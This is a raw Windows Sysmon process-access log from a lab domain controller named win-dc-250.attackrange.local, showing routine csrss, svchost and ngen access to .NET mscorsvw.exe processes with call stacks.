13:21:57.149{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1602-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.149{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1602-000000009A01}1172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.118{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1502-000000009A01}1152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.102{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1502-000000009A01}1152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.102{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1502-000000009A01}1152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.055{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4575-6000-1402-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.039{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4575-6000-1402-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:57.039{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4575-6000-1402-000000009A01}4144C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006240Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.336{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4576-6000-2502-000000009A01}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006239Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.321{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4576-6000-2502-000000009A01}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006238Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.321{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4576-6000-2502-000000009A01}4692C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006237Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.227{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4576-6000-2402-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006236Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.211{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4576-6000-2402-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006235Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.211{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4576-6000-2402-000000009A01}3920C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006234Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.180{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4576-6000-2302-000000009A01}228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006233Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.165{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4576-6000-2302-000000009A01}228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006232Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.165{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4576-6000-2302-000000009A01}228C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006231Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.133{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4576-6000-2202-000000009A01}4736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006230Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.118{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4576-6000-2202-000000009A01}4736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006229Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.118{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4576-6000-2202-000000009A01}4736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006228Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.071{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4576-6000-2102-000000009A01}3772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006227Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.055{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4576-6000-2102-000000009A01}3772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006226Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.055{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-4576-6000-2102-000000009A01}3772C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006225Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:21:58.024{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4576-6000-2002-000000009A01}3544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006224Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 